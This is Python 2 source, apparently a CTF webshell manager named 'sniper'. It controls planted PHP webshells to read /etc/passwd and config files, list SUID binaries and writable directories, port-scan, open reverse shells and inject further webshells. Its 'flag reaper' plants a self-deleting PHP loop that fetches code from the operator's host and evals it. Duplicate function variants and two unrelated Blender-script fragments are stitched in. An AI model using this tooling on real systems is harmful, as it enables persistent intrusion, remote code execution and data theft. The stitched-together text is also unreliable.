def download_base(self, path, local_path):
    """Fetch the remote file *path* and write it to *local_path*.

    When *local_path* already exists, the remote and local hashes (logged as
    md5) are compared first and the transfer is skipped if they match.  The
    remote side answers with base64 text, which is decoded with the Python 2
    ``str.decode("base64")`` codec before being written in binary mode.
    Nothing is returned; every outcome is reported through ``Log``.
    """
    Log.info("Ready to downloading file : %s" % path)
    Log.info("Detacting local file exists...")
    if os.path.exists(local_path):
        Log.info("Checking remote file (%s) hash..." % (path))
        remote_hash = self.hash_remote_file(path)
        Log.info("Find md5 of remote file (%s) : %s" % (path, remote_hash))
        Log.info("Checking local file (%s) hash..." % (local_path))
        local_hash = hash_file(local_path)
        Log.info("Find md5 of local file (%s) : %s" % (local_path, local_hash))
        if remote_hash == local_hash:
            # Identical copy already on disk: nothing to transfer.
            Log.warning("File haved downloaded! Ignored!")
            return
        Log.warning("File updated, downloading new version...")
    else:
        Log.error("Local file not exists...")
    # NOTE(review): *path* is spliced into the generated PHP statement without
    # escaping, so a path containing a double quote breaks the statement.
    php_statement = 'echo base64_encode(file_get_contents("%s"));' % (path)
    result = self.php_code_exec_token(php_statement)
    if not result[0]:
        Log.error("Fetch data failed!")
        return
    Log.success("Fetch data success! Start saving...")
    encoded = result[1]
    with open(local_path, "wb") as out:
        Log.info("Saving...")
        out.write(encoded.decode("base64"))
    Log.info("Download finished!")
def page(self):
    """Return the slice of ``self.collection`` that belongs to the current page.

    The window is ``self.limit`` items wide and starts at
    ``(self.page_number - 1) * self.limit``.  If slicing raises, the exception
    is logged as a warning and an empty list is returned instead.
    """
    offset = (self.page_number - 1) * self.limit
    window = slice(offset, offset + self.limit)
    try:
        return self.collection[window]
    except Exception as detail:
        Log.warning(detail)
        return []
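def page(self):
    """Return the items of ``self.collection`` on the current page.

    Pages are 1-based: page ``k`` covers indices ``(k - 1) * limit`` up to
    (but excluding) ``k * limit``.  A page number below 1 yields ``[]``
    instead of a negative slice, which would otherwise return items from the
    end of the collection.  If slicing raises, the exception is logged as a
    warning and ``[]`` is returned.
    """
    if self.page_number < 1:
        # A negative start index would wrap around to the tail of the
        # collection; there is no page before the first one.
        return []
    start = (self.page_number - 1) * self.limit
    end = start + self.limit
    try:
        items = self.collection[start:end]
        return items
    except Exception as detail:
        Log.warning(detail)
        return []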
def get_writable_directory(self):
    """Log the directories under ``self.webroot`` that ``find -type d -writable`` reports.

    Nothing is returned: a hit is logged as success with the raw listing, an
    empty listing as a warning, and a failed command as an error carrying the
    command output.
    """
    command = "find %s -type d -writable" % (self.webroot)
    output = self.auto_exec(command)
    if not output[0]:
        Log.error("Error occured! %s" % output[1])
        return
    if output[1] == "":
        Log.warning("Nothing found!")
        return
    Log.success("Found : \n%s" % output[1])
def get_config_file(self):
    """Search ``self.webroot`` for files whose name contains a config-like keyword.

    Runs one ``find -name '*<keyword>*'`` per keyword (``config``, ``db``,
    ``database``) and logs each listing; nothing is returned.
    """
    for keyword in ("config", "db", "database"):
        Log.info("Using keyword : [%s]..." % (keyword))
        output = self.auto_exec("find %s -name '*%s*'" % (self.webroot, keyword))
        if not output[0]:
            Log.error("Error occured! %s" % output[1])
        elif output[1] == "":
            Log.warning("Nothing found!")
        else:
            Log.success("Found : \n%s" % output[1])
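def get_suid_binaries(self):
    """Log root-owned setuid files in the standard binary directories.

    Runs ``find <dir> -user root -perm -4000 -exec ls -ldb {} \\;`` once per
    directory in *paths*.  Each run logs the listing on success, a
    "Nothing found!" warning when empty, or the command error.  Nothing is
    returned.
    """
    paths = ['/usr/local/sbin', '/usr/local/bin', '/usr/sbin', '/usr/bin',
             '/sbin', '/bin', '/usr/games', '/usr/local/games', '/snap/bin']
    # Raw string: "\;" is not a valid Python escape sequence.  The old
    # non-raw literal only produced the intended backslash-semicolon because
    # unknown escapes are passed through, and newer interpreters warn on it.
    command_template = r"find %s -user root -perm -4000 -exec ls -ldb {} \;"
    for path in paths:
        command = command_template % (path)
        Log.info("Executing : %s" % (command))
        output = self.auto_exec(command)
        if not output[0]:
            Log.error("Error occured! %s" % output[1])
        elif output[1] == "":
            Log.warning("Nothing found!")
        else:
            Log.success("Found : \n%s" % output[1])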
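def check_connection(self, url, timeout=30):
    """Return True when a HEAD request to *url* completes, False on a transport error.

    A non-200 status is logged as a warning but still counts as reachable.
    *timeout* (seconds, constructed default) bounds the request so that a
    stalled server cannot block the check indefinitely.
    """
    Log.info("Checking the connection to the webshell...")
    try:
        response = requests.head(url, timeout=timeout)
    except requests.RequestException as exc:
        # Only client/network failures mean "unreachable".  The previous bare
        # ``except:`` also swallowed KeyboardInterrupt, SystemExit and any
        # programming error, reporting all of them as a connection problem.
        Log.error("Connection error! %s" % (exc))
        return False
    code = response.status_code
    if code != 200:
        Log.warning("The status code is %d, the webshell may have some problems..." % (code))
    else:
        Log.success("The status code is %d" % (code))
    return True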
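def get_disabled_functions(self):
    """Populate and log ``self.disabled_functions`` from the target's ``disable_functions`` setting.

    A non-empty cached list is logged without re-querying.  On a failed query
    the list is left untouched and the error is logged; an empty setting
    resets the list to ``[]``.  Nothing is returned.
    """
    if self.disabled_functions:
        Log.success("Disabled functions : \n%s" % list2string(self.disabled_functions, "\t[", "]\n"))
        return
    result = self.php_code_exec_token("echo ini_get('disable_functions');")
    if not result[0]:
        Log.error("Error occured! %s" % result[1])
        return
    if result[1] == "":
        Log.warning("No function disabled!")
        self.disabled_functions = []
        return
    # The setting is a comma-separated list that may or may not end with a
    # trailing comma.  The old ``split(",")[0:-1]`` silently dropped the last
    # name whenever there was no trailing comma; keep every non-empty entry.
    self.disabled_functions = [name.strip() for name in result[1].split(",") if name.strip()]
    Log.success("Disabled functions : \n%s" % list2string(self.disabled_functions, "\t[", "]\n"))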
def get_writable_directory(self):
    """Return the directories under ``self.webroot`` that ``find -type d -writable`` reports.

    Lines that start with ``find: '`` (find's own diagnostics) are dropped.
    Returns ``[]`` when the listing is empty or the command fails; the
    outcome is also logged.
    """
    output = self.auto_exec("find %s -type d -writable" % (self.webroot))
    if not output[0]:
        Log.error("Error occured! %s" % output[1])
        return []
    listing = output[1]
    if listing == "":
        Log.warning("Nothing found!")
        return []
    Log.success("Found : \n%s" % listing[0:-1])
    # ``split("\n")[0:-1]`` discards the piece after the final newline
    # (presumably the empty tail of a newline-terminated listing).
    return [line for line in listing.split("\n")[0:-1]
            if not line.startswith("find: '")]
def show_options(self):
    """Log a tab-separated table of this module's options.

    One row per key of ``self.config`` in sorted order: the option name, its
    ``necessity`` entry and the value ``self.get_config`` returns for it.
    """
    Log.warning("Options\t\tNecessity\t\tDefault")
    Log.warning("-------\t\t---------\t\t-------")
    for name in sorted(self.config):
        necessity = self.config[name]["necessity"]
        Log.warning("%s\t\t%s\t\t\t%s" % (name, necessity, self.get_config(name)))
def show_options(self):
    '''
    Log this module's option table (the ``config`` defined earlier).
    Triggered by the ``options`` command; usually needs no changes.

    One row per key of ``self.config`` in sorted order: the option name,
    its ``necessity`` entry and the value ``self.get_config`` returns.
    '''
    Log.warning("Options\t\tNecessity\t\tDefault")
    Log.warning("-------\t\t---------\t\t-------")
    for name in sorted(self.config):
        row = (name, self.config[name]["necessity"], self.get_config(name))
        Log.warning("%s\t\t%s\t\t\t%s" % row)
#"space_view3d_Meta-Tools_0-3_tab", "mass_align", "modifier_tool", "subdiv_tool", "wireframe_toggle", "DeadlineBlenderClient", "custom_file_tab", #turns off remap relative. *Addon's cannot be unregistered. Remove the file to permanently remove the addon "cubesurfer", ] import addon_utils for addon in addon_startup_list: try: addon_utils.enable(addon, default_set=True) except: log.warning("Could not enable addon %s - skipped" % addon) else: log.info("Loaded addon %s" % addon) # Setup defaults - base this on the show. TODO: un-hardcode this # Basic render settings bpy.context.scene.render.fps = 24 bpy.context.scene.render.resolution_x = 1440 bpy.context.scene.render.resolution_y = 810 bpy.context.scene.render.resolution_percentage = 100 bpy.context.scene.render.pixel_aspect_x = 1.0 bpy.context.scene.render.pixel_aspect_y = 1.0 # Store the current render engine - we need to restore this after render_engine = bpy.context.scene.render.engine
#"space_view3d_Meta-Tools_0-3_tab", "mass_align", "modifier_tool", "subdiv_tool", "wireframe_toggle", "DeadlineBlenderClient", "custom_file_tab", #turns off remap relative. *Addon's cannot be unregistered. Remove the file to permanently remove the addon "cubesurfer", ] import addon_utils for addon in addon_startup_list: try: addon_utils.enable(addon, default_set=True) except: log.warning("Could not enable addon %s - skipped" % addon) else: log.info("Loaded addon %s" % addon) # Setup defaults - base this on the show. TODO: un-hardcode this # Basic render settings bpy.context.scene.render.fps = 24 bpy.context.scene.render.resolution_x = 1440 bpy.context.scene.render.resolution_y = 810 bpy.context.scene.render.resolution_percentage = 100 bpy.context.scene.render.pixel_aspect_x = 1.0 bpy.context.scene.render.pixel_aspect_y = 1.0 # Store the current render engine - we need to restore this after
def main():
    """Entry point of the interactive console.

    Command line: one argument is read as a JSON file holding a list of
    entries with ``url``/``method``/``password`` keys, of which only the
    working, non-duplicate ones are kept; three arguments build a single
    entry from ``url method password``.  Any other argument count prints
    the help and exits.  The loop then reads one command per line and runs
    it against every entry in ``webshells``; unknown input is executed as a
    shell command (locally by default, see ``setl``/``setr``).

    Python 2 only: ``raw_input``, ``string.lower``, ``string.letters`` and
    ``str.encode("base64")`` do not exist on Python 3.
    """
    signal.signal(signal.SIGINT, signal_handler)
    signal.signal(signal.SIGTERM, signal_handler)
    # Prefix of the JSON file written on quit.  NOTE(review): the "aiw" and
    # "aimw" commands below rebind this name to a random string, so the file
    # saved on quit changes name after either of them has been used.
    default_filename = "webshells"
    banner()
    webshells = []
    if len(sys.argv) == 2:
        filename = sys.argv[1]
        Log.info("Loding from file : %s ..." % (filename))
        # The file handle is never closed explicitly, and the config is
        # trusted as-is: a missing key raises KeyError below.
        webshells_config = json.load(open(filename))
        for webshell_config in webshells_config:
            webshell = WebShell(webshell_config['url'], webshell_config['method'], webshell_config['password'])
            if webshell.working:
                Log.success("This webshell works well, adding into online list...")
                # Duplicate detection by url only.
                SAME_FLAG = False
                for online_webshell in webshells:
                    if online_webshell.url == webshell.url:
                        Log.warning("Same webshell detected! Skipping...")
                        SAME_FLAG = True
                        break
                if SAME_FLAG:
                    continue
                webshells.append(webshell)
            else:
                Log.error("This webshell can not work...")
        Log.info("Loading file finished!")
        if len(webshells) == 0:
            Log.error("No webshell works well, exiting...")
            # builtin exit() is provided by the site module; sys.exit() is the
            # portable form.
            exit(2)
        Log.info("%d webshells alive!" % (len(webshells)))
        Log.info("Entering interactive mode...")
    elif len(sys.argv) == 4:
        url = sys.argv[1]
        method = sys.argv[2]
        password = sys.argv[3]
        webshell = WebShell(url, method, password)
        if webshell.working:
            Log.success("This webshell works well, adding into online list...")
            webshells.append(webshell)
        else:
            Log.error("This webshell can not work...")
            exit(3)
    else:
        show_help()
        exit(1)
    # True: unrecognised input runs on localhost; False: on every target.
    LOCAL_COMMAND_FLAG = True
    main_help()
    while True:
        Log.context("sniper")
        # Empty input defaults to the help command.
        context_fresh = raw_input("=>") or "h"
        context = string.lower(context_fresh)
        if context == "h" or context == "help" or context == "?":
            main_help()
        #elif context == "sh" or context == "shell":
        #    shell = Shell(webshell)
        #    shell.interactive()
        elif context == "rsh" or context == "rshell":
            Log.info("socat file:`tty`,raw,echo=0 tcp-l:8888")
            # get_ip_address() is evaluated twice when the prompt is left empty.
            ip = raw_input("[IP] : (%s)" % (get_ip_address())) or get_ip_address()
            port = raw_input("[PORT] : (8888)") or "8888"
            Log.info("Starting reverse shell (%s:%s)" % (ip, port))
            for webshell in webshells:
                Log.info(str(webshell.info))
                webshell.reverse_shell(ip, port)
        elif context == "p" or context == "print":
            for webshell in webshells:
                Log.info(str(webshell.info))
                webshell.print_info()
        elif context == "pv" or context == "php_version":
            for webshell in webshells:
                Log.info(str(webshell.info))
                Log.success(webshell.get_php_version())
        elif context == "kv" or context == "kernel_version":
            for webshell in webshells:
                Log.info(str(webshell.info))
                Log.success(webshell.get_kernel_version())
        elif context == "c" or context == "config":
            for webshell in webshells:
                Log.info(str(webshell.info))
                Log.info("Detacting config files...")
                webshell.get_config_file()
        elif context == "fwd":
            for webshell in webshells:
                Log.info(str(webshell.info))
                webshell.get_writable_directory()
        elif context == "gdf":
            for webshell in webshells:
                Log.info(str(webshell.info))
                webshell.get_disabled_functions()
        elif context == "fwpf":
            for webshell in webshells:
                Log.info(str(webshell.info))
                webshell.get_writable_php_file()
        elif context == "fsb":
            for webshell in webshells:
                Log.info(str(webshell.info))
                webshell.get_suid_binaries()
        elif context == "setr":
            LOCAL_COMMAND_FLAG = False
        elif context == "setl":
            LOCAL_COMMAND_FLAG = True
        elif context == "dla":
            # NOTE(review): ``webshell`` here is whatever the previous loop (or
            # the loading code) left bound, not a chosen entry; the prompt
            # default therefore assumes all entries share one webroot.
            path = raw_input("Input path (%s) : " % webshell.webroot) or (webshell.webroot)
            args = raw_input("Please custom find args (%s) : " % (" -size 500k")) or " -size 500k"
            Log.info("Using command : find %s %s" % (path, args))
            for webshell in webshells:
                Log.info(str(webshell.info))
                webshell.download_advanced(path, args)
        elif context == "dl":
            # Same leftover-``webshell`` caveat as in "dla" above.
            path = raw_input("Input path (%s) : " % webshell.webroot) or (webshell.webroot)
            for webshell in webshells:
                Log.info(str(webshell.info))
                if not webshell.file_exists(path):
                    Log.error("The file [%s] is not exists on the server!" % (path))
                    continue
                if webshell.is_directory(path):
                    Log.info("The target file is a directory, using recursion download...")
                    filename_filter = raw_input("Input --name '%s' : " % ("*.php")) or "*.php"
                    webshell.download_recursion(path, filename_filter)
                else:
                    #filename = path.split("/")[-1]
                    #local_path = raw_input("Input local path (%s) to save the file : " % filename) or (filename)
                    # Log.info("Using root path : [%s] to save!" % (local_path))
                    Log.info("The target file is a single file, starting download...")
                    # The remote path doubles as the local save path.
                    webshell.download(path, path)
        elif context == "ps":
            hosts = raw_input("Input hosts (192.168.1.1/24) : ") or "192.168.1.1/24"
            if not "/" in hosts:
                Log.error("Please use the format IP/MASK , if want to scan a single host , set MASK=32")
                continue
            ports = raw_input("Input ports (21,22,25,80,443,445,3389)") or "21,22,25,80,443,445,3389"
            for webshell in webshells:
                Log.info(str(webshell.info))
                webshell.port_scan(hosts, ports)
        elif context == "aiw":
            # Rebinds the function-level default_filename (see the note at the
            # top of main).
            default_filename = random_string(0x10, string.letters)
            default_password = md5(md5("%s%s%s" % (salt, default_filename, salt)))
            filename = raw_input("Filename (.%s.php): " % (default_filename)) or (".%s.php" % (default_filename))
            password = raw_input("Password (%s): " % (default_password)) or ("%s" % (default_password))
            for webshell in webshells:
                Log.info(str(webshell.info))
                webshell.auto_inject_webshell(filename, password)
        elif context == "aimw":
            # Same rebinding of default_filename as in "aiw".
            default_filename = random_string(0x10, string.letters)
            default_password = md5(md5("%s%s%s" % (salt, default_filename, salt)))
            filename = raw_input("Filename (.%s.php): " % (default_filename)) or (".%s.php" % (default_filename))
            password = raw_input("Password (%s): " % (default_password)) or ("%s" % (default_password))
            for webshell in webshells:
                Log.info(str(webshell.info))
                webshell.auto_inject_memery_webshell(filename, password)
        elif context == "fr":
            Log.info("Starting flag reaper...")
            webserver_host = raw_input("[IP] (%s) : " % (get_ip_address())) or get_ip_address()
            # int() on free-form input raises ValueError and aborts the loop.
            webserver_port = int(raw_input("[PORT] (80) : ") or "80")
            filename = ".%s.php" % (random_string(0x10, string.letters))
            file_content = "ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);while(true){$code = file_get_contents('http://%s:%d/code.txt');eval($code);sleep(5);}" % (webserver_host, webserver_port)
            Log.info("Temp memory phpfile : %s" % (file_content))
            Log.info("Encoding phpfile...")
            file_content = '<?php unlink(__FILE__);eval(base64_decode("%s"));?>' % (file_content.encode("base64").replace("\n", ""))
            Log.info("Final memory phpfile : %s" % (file_content))
            for webshell in webshells:
                Log.info(str(webshell.info))
                result = webshell.auto_inject_flag_reaper(filename, file_content)
                if result:
                    Log.success("Please check the web server(%s:%d) log to get your flag!" % (webserver_host, webserver_port))
                    Log.info("Tips : tail -f /var/log/apache2/access.log")
                else:
                    Log.error("Starting flag reaper failed!")
        elif context == "r" or context == "read":
            filepath = raw_input("Input file path (/etc/passwd) : ") or "/etc/passwd"
            for webshell in webshells:
                Log.info(str(webshell.info))
                webshell.read_file(filepath)
        elif context == "db" or context == "database":
            ip = raw_input("IP (127.0.0.1): ") or "127.0.0.1"
            username = raw_input("Username (root): ") or "root"
            password = raw_input("Password (root): ") or "root"
            # NOTE(review): the database password is written to the log in
            # clear text here.
            Log.info("Creating connection by [%s:%s] to [%s]..." % (username, password, ip))
            for webshell in webshells:
                Log.info(str(webshell.info))
                mysql_connection = Mysql(webshell, ip, username, password)
                if not mysql_connection.function:
                    Log.error("The target server cannot support mysql!")
                    continue
                if not mysql_connection.connection_flag:
                    Log.error("Connection failed!")
                    continue
                Log.success("Connection success!")
                # ``function`` was already checked for falsiness above, so the
                # else branch here is unreachable for an empty string.
                if mysql_connection.function != "":
                    Log.success("Entering database server interactive mode...")
                    mysql_connection.interactive()
                else:
                    Log.error("No supported database function!")
        elif context == "q" or context == "quit" or context == "exit":
            Log.info("recording this webshell to the log file...")
            save_webshells(webshells, "%s_%d.json" % (default_filename, time.time()))
            Log.info("Quiting...")
            break
        else:
            # Anything not matched above is run as a raw shell command: with
            # the default LOCAL_COMMAND_FLAG a mistyped command executes on the
            # operator's own machine via os.system.
            Log.error("Unsupported function!")
            if LOCAL_COMMAND_FLAG == True:
                Log.info("Executing command on localhost...")
                os.system(context_fresh)
            else:
                Log.info("Executing command on target server...")
                for webshell in webshells:
                    Log.info(str(webshell.info))
                    webshell.auto_exec_print(context_fresh)